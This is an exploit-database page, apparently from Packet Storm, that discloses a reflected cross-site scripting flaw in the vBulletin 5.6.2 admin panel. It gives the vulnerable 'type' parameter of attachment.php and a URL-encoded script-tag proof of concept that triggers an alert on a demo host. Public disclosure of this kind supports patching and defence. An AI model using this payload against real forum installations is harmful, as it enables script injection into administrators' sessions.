vBulletin version 5.6.2 suffers from a cross site scripting vulnerability.
9ecbb502c74dcc25b94acca4c4d869e8c562d90358ff917a5d5953a2dd70e92f# Exploit Title: vBulletin 5.6.2 Cross Site Scripting
# Date:12.08.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/08/cross-site-scripting-in-vbulletin-ver.html
So..
We have a cross site scripting in the vBulletin 5.6.2
PoC:
I use demo admin panel for test.
Our vuln link :
https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=[our xss is here]
Full link with code:
https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=%22%22%3E%3Cscript%3Ealert(%22cross%20site%20scripting%20%22)%3C/script%3E
Picture:
https://imgur.com/a/OicFHyA
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed